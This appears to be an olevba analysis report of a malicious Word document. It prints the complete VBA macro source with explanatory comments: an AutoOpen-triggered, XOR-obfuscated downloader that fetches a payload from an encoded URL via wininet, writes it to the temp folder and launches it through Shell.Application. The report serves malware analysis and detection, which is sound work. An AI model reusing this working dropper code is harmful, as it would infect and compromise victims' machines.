- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASIHB- 6.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: 6.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: 6.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub TRENTON(MARCELINO As Long) ' Trampoline: never reads MARCELINO, only calls HARRIS (module CLAY)
- HARRIS
- End Sub
- Sub autoopen() ' Auto-exec entry point (flagged AutoExec/AutoOpen in the analysis table below): start of the call chain TRENTON -> HARRIS -> FREDERIC -> MERRILL -> CLEMENT -> JARVIS
- TRENTON (443) ' the literal 443 has no effect; TRENTON ignores its argument
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+----------+---------------------------------------+
- | Type | Keyword | Description |
- +----------+----------+---------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- +----------+----------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO PERCY.bas
- in file: 6.doc - OLE stream: u'Macros/VBA/PERCY'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- #If VBA7 And Win64 Then
- Public Declare PtrSafe Function MICHEL Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal THERON As LongPtr, ByVal RAYMUNDO As String, ByVal TRISTAN As String, ByVal BRIAN As Long, ByVal HOUSTON As Long, ByVal LINCOLN As Long) As LongPtr ' 64-bit declaration: MICHEL aliases wininet's InternetOpenUrlA; called from CLIFF (module DEXTER)
- #End If
- Public Function GENARO(ByRef GRAHAM As Object, ByRef ISAIAH As String, VAUGHN As Double) As Boolean ' Launch step: creates a COM object from a decoded ProgID and calls its Open method on GRAHAM & ISAIAH; VAUGHN is unused and the Boolean result is never assigned
- Set AVERY = CreateObject _
- (BENNETT _
- (OCTAVIO, CORNELL)) ' BENNETT XOR-decodes CORNELL with key OCTAVIO; the result is "Shell.Application"
- Dim NORRIS As Integer
- NORRIS = AVERY.Open(GRAHAM & ISAIAH) ' same concatenation JARVIS uses as the download destination, i.e. the dropped file is opened via the shell; presumably GRAHAM contributes its default Path property - confirm
- End Function
- Public Function GONZALO(DERICK As Long, RODRIGO As String, STACEY As String) As String ' Thin wrapper over the BENNETT decoder: RODRIGO is the key, STACEY the hex-encoded ciphertext
- DERICK = DERICK * 2 ' junk arithmetic; DERICK does not influence the returned string
- GONZALO = BENNETT(RODRIGO, STACEY)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Open | May open a file |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | wininet.dll | Executable file name |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO CLAY.bas
- in file: 6.doc - OLE stream: u'Macros/VBA/CLAY'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- #If VBA7 And Win64 Then
- Public Declare PtrSafe Function SAMMIE Lib "wininet.dll" Alias "InternetOpenA" (ByVal DALTON As String, ByVal MONROE As Long, ByVal DOMINIQUE As String, ByVal TRISTANO As String, ByVal BOOKER As Long) As LongPtr ' 64-bit declaration: SAMMIE aliases wininet's InternetOpenA; called from EFRAIN (module LAMAR)
- #End If
- Public Function GERMAN(ByRef WILMER As String, ByRef GIOVANNI As Long) As Integer ' Returns byte number GIOVANNI of hex string WILMER: two hex digits cut out by BERNIE and parsed with Val("&H" ...)
- GERMAN = Val("&H" & (BERNIE(62, WILMER, FLETCHER(GIOVANNI), 2))) ' the literal 62 is a decoy argument; BERNIE only uses the string, offset and length
- End Function
- Public Function FLETCHER(ByRef GIOVANNI As Long) As Long ' Maps a 1-based byte index to the 1-based position of its first hex digit (2n - 1)
- FLETCHER = (2 * GIOVANNI) - 1
- End Function
- Public Function BENNETT(HERSCHEL As String, WILMER As String) As String ' String decoder used for every encoded constant: XORs each hex-encoded byte of WILMER with a repeating key byte from HERSCHEL and returns the plaintext
- Dim NUMBERS As Integer
- Dim BUFORD As Integer
- Dim SANFORD As Long
- SANFORD = 221
- If SANFORD > SANFORD * 4 Then End ' junk: 221 > 884 is always false, so End never runs
- Dim GIOVANNI As Long
- Dim BARNEY As String
- For GIOVANNI = 1 To (NESTOR(WILMER) / 2) ' NESTOR is Len, so this iterates once per encoded byte
- NUMBERS = GERMAN(WILMER, GIOVANNI) ' ciphertext byte
- BUFORD = LAVERNE(HERSCHEL, GIOVANNI) ' key byte; LAVERNE indexes the key at (i Mod Len) + 1, so the first byte is XORed with the key's second character
- BARNEY = BARNEY + BRANDEN(NUMBERS, BUFORD) ' BRANDEN returns Chr(ciphertext Xor key)
- Next GIOVANNI
- BENNETT = BARNEY
- End Function
- Public Sub HARRIS() ' Hop in the call chain from autoopen; its only effective statement is the call to FREDERIC
- Dim BERT As Double
- Dim SILAS As Double
- For SILAS = 67 To 68 ' junk loop: the result is never used
- SILAS = SILAS + 99
- Next SILAS
- FREDERIC (5.09) ' FREDERIC ignores its argument and calls MERRILL
- End Sub
- Public Function MERRILL(MERLIN As String) ' Hop in the call chain; MERLIN and IRWIN are decoys, the only effective statement is the call to CLEMENT
- Dim IRWIN As String
- IRWIN = "KIRBY"
- CLEMENT 44 + 0.33 ' hands control to CLEMENT (module ROLANDO), which leads to the download and launch in JARVIS
- IRWIN = IRWIN + "CRUZ"
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | wininet.dll | Executable file name |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO ROLANDO.bas
- in file: 6.doc - OLE stream: u'Macros/VBA/ROLANDO'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function RIGOBERTO(ALPHONSO As Long, ByVal SHELBY As String) As Boolean ' Download step: opens a wininet session, opens the decoded URL, reads the response in chunks and writes it to the file path SHELBY; returns True when data was received. ALPHONSO is unused
- #If VBA7 And Win64 Then
- Dim RICKIE As LongPtr, BOBBIE As LongPtr
- #Else
- Dim RICKIE As Long, BOBBIE As Long
- #End If
- Dim MAURICIO As Long
- Dim SONNY As String * PASQUALE, DALTON As String ' SONNY is a fixed-length read buffer of PASQUALE (4800) characters; DALTON accumulates the response
- Dim QUINCY As Integer, SEBASTIAN As Double
- RICKIE = EFRAIN ' session handle from InternetOpenA (see EFRAIN in module LAMAR)
- If RICKIE = 0 Then ' no session handle: give up, function result stays False
- Exit Function
- End If
- Dim FEDERICO As Boolean
- If CLIFF(BOBBIE, RICKIE) Then ' CLIFF stores the InternetOpenUrlA handle in BOBBIE (ByRef); its own return value is ignored here
- End If
- If BOBBIE = 0 Then ' URL could not be opened: nothing is written
- SEBASTIAN = 0
- Else
- ULYSSES BOBBIE, SONNY, PASQUALE, MAURICIO ' first InternetReadFile call; MAURICIO receives the byte count
- DALTON = SONNY
- Dim JACKSON As Integer
- JACKSON = 0
- JACKSON = JACKSON + 33
- If JACKSON > JACKSON + 40 Then End ' junk: 33 > 73 is always false
- Do While MAURICIO <> 0 ' keep reading until InternetReadFile reports zero bytes
- ULYSSES BOBBIE, SONNY, PASQUALE, MAURICIO
- DALTON = DALTON + Mid(SONNY, 1, MAURICIO)
- Loop
- SEBASTIAN = NESTOR(DALTON): _
- QUINCY = DONNELL("DAVIS") ' SEBASTIAN = length of the received data; DONNELL ignores "DAVIS" and returns FreeFile
- Open SHELBY _
- For Binary Access Write _
- Lock Write As #QUINCY ' opens the destination path for binary writing
- Put #QUINCY, , DALTON ' writes the downloaded content to disk
- JACKSON = JACKSON + 62
- If JACKSON < 0 Then End ' junk: JACKSON is 95 here, so End never runs
- Close #QUINCY
- End If
- GAVIN BOBBIE ' GAVIN aliases InternetCloseHandle: closes the URL handle, then the session handle
- GAVIN RICKIE
- DALTON = ""
- If SEBASTIAN Then ' non-zero length is reported as success
- RIGOBERTO = True
- End If
- End Function
- Public Function CLEMENT(ODELL As Double) ' Last hop before the payload logic: obtains a COM object from LAURENCE and calls JARVIS; the loops and arithmetic on MAXWELL and ODELL are junk
- Dim GONZALO As Object ' local variable that shadows the GONZALO function from module PERCY inside this procedure
- Dim MAXWELL As Long
- For MAXWELL = 16 To 17
- MAXWELL = MAXWELL + 17
- Next MAXWELL
- Dim ELLIS As Object
- For MAXWELL = 11 To 21
- MAXWELL = MAXWELL + 64
- Next MAXWELL
- Set ELLIS = LAURENCE ' LAURENCE returns CreateObject on the decoded COLLIN constant ("Scripting.FileSystemObject")
- MAXWELL = MAXWELL + 35
- Dim LEWIS As Boolean
- If MAXWELL > MAXWELL * 333 Then End ' junk: false for the positive value MAXWELL holds here
- LEWIS = JARVIS(GONZALO, ELLIS) ' JARVIS downloads and launches the payload; it overwrites its first argument and never reads the second
- ODELL = ODELL + 14
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+---------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+---------+-----------------------------------------+
- | Suspicious | Open | May open a file |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Put | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Binary | May read or write a binary file (if |
- | | | combined with Open) |
- +------------+---------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO CORNELIUS.bas
- in file: 6.doc - OLE stream: u'Macros/VBA/CORNELIUS'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Option Explicit
- #If VBA7 And Win64 Then
- Public Declare PtrSafe Function ULYSSES Lib "wininet.dll" Alias "InternetReadFile" (ByVal WILFORD As LongPtr, ByVal SONNY As String, ByVal SHELTON As Long, CARSON As Long) As Integer ' 64-bit declaration: ULYSSES aliases wininet's InternetReadFile; called from RIGOBERTO
- #End If
- Public Const CORNELL = "062F303F38670F3529233C2D2642283A29" ' hex-encoded, XORed with OCTAVIO: ProgID given to CreateObject in GENARO; decodes to "Shell.Application"
- Public Const AURELIO = "09373C36263B2B73772A2D2B" ' hex-encoded, XORed with OCTAVIO: file name appended to the temp-folder path in JARVIS, i.e. the drop location (host IOC once decoded)
- Public Const WINFRED = "3D3321236E6661273C3F3827295E223D2E7B303B24617D6A60637F69533930" ' hex-encoded, XORed with OCTAVIO: URL passed to InternetOpenUrlA in CLIFF, i.e. the download source (network IOC once decoded)
- Public Const COLLIN = "0624273A243D272B3E6113272B53122C34213639062C2F3C2C21" ' hex-encoded, XORed with OCTAVIO: ProgID given to CreateObject in LAURENCE; decodes to "Scripting.FileSystemObject"
- Public Const OCTAVIO = "AUGUSTINEYOUNG6" ' repeating XOR key for the four encoded constants above (see BENNETT and LAVERNE)
- Public Const PASQUALE = 4800 ' read-buffer size used with InternetReadFile in RIGOBERTO
- Public Const MOHAMMAD As String = "LEONEL" ' first argument (agent string) of InternetOpenA in EFRAIN; usable as a User-Agent indicator in proxy logs
- Public Const MARIANO = 1 ' access-type argument of InternetOpenA; 1 is INTERNET_OPEN_TYPE_DIRECT
- Public Const DANIAL = &H4000000 ' flags argument of InternetOpenUrlA in CLIFF; 0x04000000 is INTERNET_FLAG_NO_CACHE_WRITE
- Sub FREDERIC(SANTOS As Double) ' Hop in the call chain: ignores SANTOS and calls MERRILL
- MERRILL ("BLAIRLANDON") ' MERRILL never reads this string
- End Sub
- Public Function BRANDEN(ByRef NUMBERS As Integer, ByRef BUFORD As Integer) As String ' Decodes one character: Chr(ciphertext byte Xor key byte)
- BRANDEN = Chr(NUMBERS Xor BUFORD)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Xor | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | wininet.dll | Executable file name |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO LAMAR.bas
- in file: 6.doc - OLE stream: u'Macros/VBA/LAMAR'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Const JASPER = "RUSSEL" ' not referenced by any macro shown in this report
- #If VBA7 And Win64 Then
- #Else
- Public Declare Function GAVIN Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef ERROL As Long) As Long ' 32-bit declarations of the four wininet imports; the 64-bit counterparts are split across modules AMOS, CLAY, CORNELIUS and PERCY
- Public Declare Function SAMMIE Lib "wininet.dll" Alias "InternetOpenA" (ByVal DALTON As String, ByVal MONROE As Long, ByVal DOMINIQUE As String, ByVal TRISTANO As String, ByVal BOOKER As Long) As Long
- Public Declare Function ULYSSES Lib "wininet.dll" Alias "InternetReadFile" (ByVal WILFORD As Long, ByVal SONNY As String, ByVal SHELTON As Long, CARSON As Long) As Integer
- Public Declare Function MICHEL Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal THERON As Long, ByVal RAYMUNDO As String, ByVal TRISTAN As String, ByVal BRIAN As Long, ByVal HOUSTON As Long, ByVal LINCOLN As Long) As Long
- #End If
- Public Function LAVERNE(ByRef HERSCHEL As String, ByRef GIOVANNI As Long) As Integer ' Key-byte selector for the decoder: character code of HERSCHEL at position (GIOVANNI Mod Len(HERSCHEL)) + 1
- LAVERNE = Asc(BERNIE(71, HERSCHEL, ((GIOVANNI Mod NESTOR(HERSCHEL)) + 1), 1)) ' the literal 71 is a decoy argument
- End Function
- Public Function BERNIE(SAMMY As Long, ByRef JAYSON As String, ByRef NUMBERS As Integer, ByRef BUFORD As Integer) As String ' Wrapper around Mid$(string, start, length); SAMMY plays no part in the result
- BERNIE = Mid$(JAYSON, NUMBERS, BUFORD)
- SAMMY = SAMMY + 31 ' junk arithmetic
- End Function
- #If VBA7 _
- And Win64 Then
- Public Function EFRAIN() As LongPtr ' Opens the wininet session and returns its handle (pointer-sized on 64-bit Office)
- #Else
- Public Function EFRAIN() As Long ' Opens the wininet session and returns its handle (32-bit Office)
- #End If
- EFRAIN = SAMMIE(MOHAMMAD, MARIANO, vbNullString, vbNullString, 0) ' InternetOpenA with agent string MOHAMMAD ("LEONEL"), access type MARIANO (1), no proxy strings, flags 0
- End Function
- Public Function NESTOR(JAYSON As String) As Long ' Wrapper around Len, used to hide the built-in call
- NESTOR = Len(JAYSON)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | wininet.dll | Executable file name |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO DEXTER.bas
- in file: 6.doc - OLE stream: u'Macros/VBA/DEXTER'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function LAURENCE() As Object ' Returns a COM object created from the decoded COLLIN constant ("Scripting.FileSystemObject")
- Dim ISMAEL As String
- ISMAEL = BENNETT(OCTAVIO, COLLIN) ' XOR-decode COLLIN with key OCTAVIO
- Set LAURENCE = CreateObject(ISMAEL)
- End Function
- #If VBA7 And Win64 Then
- Public Function CLIFF(ByRef GRADY As LongPtr, NOAH As LongPtr) As Boolean ' Opens the download URL on session NOAH and stores the resulting handle in GRADY (64-bit Office)
- #Else
- Public Function CLIFF(ByRef GRADY As Long, NOAH As Long) As Boolean ' Opens the download URL on session NOAH and stores the resulting handle in GRADY (32-bit Office)
- #End If
- Dim JACQUES As Double
- Dim GUADALUPE As String
- Dim CLARK As Long
- GUADALUPE = GONZALO(893, OCTAVIO, WINFRED) ' decoded download URL; the literal 893 has no effect on the result
- For JACQUES = 14 To 15 ' junk loop
- JACQUES = JACQUES + 5.5
- Next JACQUES
- GRADY = MICHEL(NOAH, GUADALUPE, vbNullString, 0, DANIAL, 0) ' InternetOpenUrlA(session, url, no extra headers, 0, flags DANIAL, context 0)
- CLIFF = True ' always True, even when the handle is 0; the caller (RIGOBERTO) checks the handle itself
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------+--------------------------+
- | Type | Keyword | Description |
- +------------+--------------+--------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- +------------+--------------+--------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO AMOS.bas
- in file: 6.doc - OLE stream: u'Macros/VBA/AMOS'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- #If VBA7 And Win64 Then
- Public Declare PtrSafe Function GAVIN Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef ERROL As LongPtr) As Long ' 64-bit declaration: GAVIN aliases wininet's InternetCloseHandle; called from RIGOBERTO
- #End If
- Public Function JARVIS(ByRef GRAHAM As Object, ByRef HOMER As Object) As Boolean ' Core of the downloader: builds the drop path (temp folder + decoded file name), downloads to it via RIGOBERTO, then opens it via GENARO; HOMER is never read
- Dim HARRISON As Long
- Set GRAHAM = IGNACIO(LAURENCE) ' temp-folder object from FileSystemObject.GetSpecialFolder(2); replaces whatever the caller passed in
- Dim ADOLFO
- Dim ISAIAH As String
- ISAIAH = GONZALO(4096, OCTAVIO, AURELIO) ' decoded file name of the dropped payload; the literal 4096 has no effect on the result
- For HARRISON = 6 To 8 ' junk loop
- HARRISON = HARRISON * 55
- Next HARRISON
- ADOLFO = GRAHAM & ISAIAH ' full destination path; presumably GRAHAM contributes its default Path property - confirm
- If RIGOBERTO(354, ADOLFO) Then ' download and write to disk; the success flag is discarded (empty If body)
- End If
- JARVIS = GENARO(GRAHAM, ISAIAH, 213) ' launch step runs whether or not the download reported success
- End Function
- Public Function DONNELL(JAYSON As String) As Integer ' Wrapper around FreeFile; JAYSON is ignored
- DONNELL = FreeFile
- End Function
- Public Function IGNACIO(ByRef NICHOLAS As Object) As Object ' Returns NICHOLAS.GetSpecialFolder(2); with a FileSystemObject, 2 is TemporaryFolder
- Set IGNACIO = NICHOLAS.GetSpecialFolder(2)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+-------------+-------------------------+
- | Type | Keyword | Description |
- +------------+-------------+-------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | IOC | wininet.dll | Executable file name |
- +------------+-------------+-------------------------+